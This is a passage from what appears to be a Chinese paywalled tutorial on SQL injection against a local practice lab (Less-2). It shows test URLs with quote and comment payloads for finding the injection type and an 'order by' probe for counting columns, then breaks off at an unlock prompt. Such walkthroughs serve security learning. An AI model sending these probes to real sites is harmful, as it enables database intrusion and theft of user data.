本文详细介绍了SQL注入的步骤,从判断注入类型到利用union查询获取数据库信息。通过测试确定字段数,并通过information_schema获取表名和字段名,最终揭示了如何利用SQL注入获取用户敏感数据。
传入id=1查看页面回显
http://localhost:55007/Less-2/?id=1
第一步:判断注入类型。如字符型,数值型
传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码
http://localhost:55007/Less-2/?id=1’ --+
http://localhost:55007/Less-2/?id=1" --+
http://localhost:55007/Less-2/?id=1%20–+
第二步:判断表字段数,使用order by
http://localhost:55007/Less-2/?id=1 order by 3–+
order by 3 时页面正常
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
